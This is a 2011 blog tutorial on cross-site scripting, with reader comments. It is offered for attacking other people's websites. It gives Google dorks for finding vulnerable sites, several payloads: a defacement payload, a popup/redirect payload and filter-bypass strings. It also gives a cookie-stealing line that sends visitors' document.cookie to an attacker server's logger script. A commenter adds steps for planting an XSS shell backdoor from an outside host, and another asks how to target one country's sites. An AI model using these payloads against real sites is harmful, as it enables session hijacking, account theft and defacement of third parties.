Feb 16, 2011

A Complete Tutorial On XSS (cross site scripting)






Welcome To another lesson in which i will be covering XSS..

Table Of Contents
What is XSS?
Finding XSS Vulnerabilities
The Basics On XSS
Deface Methods
Cookie Stealing
Filtration Bypassing
___________________
What is XSS?
'XSS' also known as 'CSS' (Cross Site Scripting, Easily confused with 'Cascading Style Sheets')
is a very common vulnerbility found in Web Applications, 'XSS' allows the attacker to INSERT
malicous code,There are many types of XSS there but i will only explain 3 of them and they are most important
1-'URL XSS' this means that the XSS wont stay on the page it will only get executed if you have the malicous code in the URL and submit the url.

2- Input fields, Where ever you can insert data, it is very common, to be XSS vulnerable, for example say we found a site with a search engine, Now in the search box you enter 'hacker' now hit enter, when the page loads, if it says your data like 'Found 100 Results For hacker' ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method.

3-In the Third one  you will be able to INSERT data (code) and it will stay on the website.now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also  inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles Forums, just most  places where you insert data and it stays there. now HTML is totally different then PHP.HTML downloads to your pc and then your 'Browser' parses/interprets the code, (that's why its source is viewable) With PHP the code is interpreted on the server the script is hosted on, then the data is returned to the browser.For PHP injection its rare, But it don't harm to try. Note: PHP code cant be injected into HTML page!

Finding XSS Vulnerabilities
Well to start finding these vulnerabilities you can start checking out
Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's and many things

Using 'Google Dorks' to make the finding easier, Ok if you wanna get cracking, goto Google.com and type
inurl:"search.php?q=" now that is a common page and has a lot of results, Now lets move on to the next part

The Basics On XSS


To know the basic this Picture may help you 


The most used Xss injection is 

<script>alert("XSS")</script>

This will alert a popup saying xss if the site is vulnerable and this is easily editable means you can also inject 
<script>alert("your name or message")</script>
So going previous i told you a google dork , search.php?q= 
Well we will use this to check for vulnerabilities

To check if it is vulnerable we type

www.site.com/search.php?q=<script>alert("your name or message")</script>


This then gives a popup like this




 Many at times this works but if it does not work don't cry we have another way.. :P

 You can try injecting HTMl ;)

You can put this two strings to inject html

<h1>anything you want</h1>
<br><br><b><u>any thing you want</u></b>

so our url will be

www.site.com/search.php?q= <h1>anything you want</h1>
or 
www.site.com/search.php?q=<br><br><b><u>any thing you want</u></b>
If you see the bold text on the page and newlines then you knows its vuln

Example






















Deface Methods 
Well now you understand how XSS works, we can explain some simple XSS deface methods, there
are many ways for defacing i will mention some of the best and most I used,
 
<html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

the first one being IMG SCR, now for those of you who dont know HTML, IMG SCR is a tag, that
displays the IMAGE linked to it on the webpage.


ok now if u change the link to a valid picture link, and save it and run it you will see your deface page

let us say we have have found a Shoutbox, Comment box, or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

Ok it helps to make your picture big so it stands out and its clear the site got hacked.

Another method is using FLASH videos, its the same has the method below but a little more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

that will execute the flash video linked to it.

Now a popup or a redirection

<script>window.open( "http://hacking-class.blogspot.com" )</script>

 Cookie Stealing

This is the best thing about XSS..

First Get your self a cookie stealer- from here 

ok now you have it save it has a .php file and upload to your server, remember to create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.

ok now your gona want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth.

Now it is the time to hijack the cookies



http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
 Filteration Bypassing


Alot of sites may seem vulnerable but not executing the code..This will help you

Some common methods to bypass filteration is

')alert('xss');

or

");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit,

Please note its bad practice to use alert("XSS") to test for XSS, has ive known sites block the keyword XSS
before.

Some other ways to bypass filteration

<script type=text/javascript>alert("saurav")</script>
<script>alert("saurav")</script>;
<script>alert("saurav");</script>
<script>alert("/saurav"/)</script>

Hope that helped you


Happy Hacking

15 comments:

Gr8 tutorial buddy keep up the good work :)

Post a article on Advance XSS

one vunreable site for this is this

hi great article...tnx for writing.i have 2 questions.
1)how do you find xss vulnerable sites of a particular country(like israel)???mera matlab hai ki aisa koi google dork hai kya jisse hum sirf kisi country ke vulnerable sites ko search kar sake????
2)mujhe "shell" me thoda problem hai..how do you upload a shell and how do you make a shell a image file????
Hope u will answer..

can u post a tut .... how to set up a xss shell.. plzzz

Muhammad

1. Upload XSS shell to a free web host.
2. On the XSS vulnerable site, use <script src="http://www.yoyo.com/xssshell.asp" or whatever into the XSS vulnerable field.

Shell - http://www.darknet.org.uk/2006/12/xss-shell-v039-cross-site-scripting-backdoor-tool/

Hi,

Thanks for this tutorial, it explains XSS very well, but what I am confused is, how is any of the malicious script passed onto the website?

All I can see is, that they are getting executed at client side, from where data can be stolen, but how is this script making way into the vulnerable sites? Say for example I use google dork on a vulnerable site and say steal cookies, it will steal cookies from my browser from where I am executing it, how will other users be affted by it? unless offcourse they are using my browser, and my script/code.

http://www.go4expert.com/forums/showthread.php?t=17066 This will help you understand it in more details.

Thank you.

XSS can be prevented by simply prevent script tag how to prevent xss will help you for more XSS security

I tested everything you mentioned. Nothing worked on my website, neither injecting script, nor the img, cookie, flash. Can you get in touch with me.

Post a Comment

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More